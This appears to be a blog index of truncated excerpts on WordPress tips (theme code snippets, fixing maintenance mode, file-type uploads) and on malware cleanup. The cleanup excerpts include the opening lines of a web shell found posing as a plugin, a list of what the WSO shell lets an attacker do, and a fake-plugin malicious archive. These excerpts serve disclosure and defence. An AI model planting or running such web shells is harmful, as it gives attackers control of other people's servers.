To completely remove jQuery from your WordPress website add the following code in the functions.php file in your active theme folder: /** * Remove jQuery from front-end*/ function my_init() { if (!is_admin()) {...
The Briefly Unavailable for Scheduled Maintenance page is visible when WordPress core, theme and/or plugin updates are running. But from time to time WordPress updates break and when that happens WordPress stucks in maintenance mode. To fix this...
Noticed a file named wp-logn.php file in the plugins directory that was trying to pass as a WordPress plugin, with the following code: <?php $password='will'; $shellname='will'; $myurl=null; error_reporting(0); @set_time_limit(0); function...
A few weeks ago I was approached by a friend of mine, complaining about high load and CPU usage on one of his shared hosting servers (DELL) running CentOS 7, CloudLinux and cPanel. I was more than happy to take a look, and after a couple of minutes...
WSO (web shell by oRb) is a simple and easy to use tool for any would-be hacker to learn and use. WSO 2.6 Shell This shell allows an attacker to perform the following actions: View detailed server informationFile management (uploading, downloading...
To upload SVG files (Scalable Vector Graphics) to WordPress you don’t need any additional plugin, simply add the following code to your theme’s functions.php file: /* Upload .svg images to WordPress */...
Okay, first let’s find out if a website is using WordPress CMS, here is how: Detect WordPress by checking the page code Check the source code of the website, in Chrome go to View > Developer Options > View source or simply, right-click...
Contact form 7 is one of the most used WordPress plugins nowadays for building simple or complex contact forms on your WordPress website. Here is some custom code you can use to change text color or upper case in cf7 forms. You can add the bellow...
Okay, it’s not really a WordPress plugin, but rather a malicious script that is trying to pass as one. Upon a regular security scan of one of the websites that I maintain, I stumbled upon a ZIP archive that contains two PHP files named...
To enable webp file extension add the following code to your active theme’s functions.php file: //** *Enable upload of webp files.*/ function webp_upload_mimes($existing_mimes) { $existing_mimes['webp'] = 'image/webp'; return $existing_mimes;...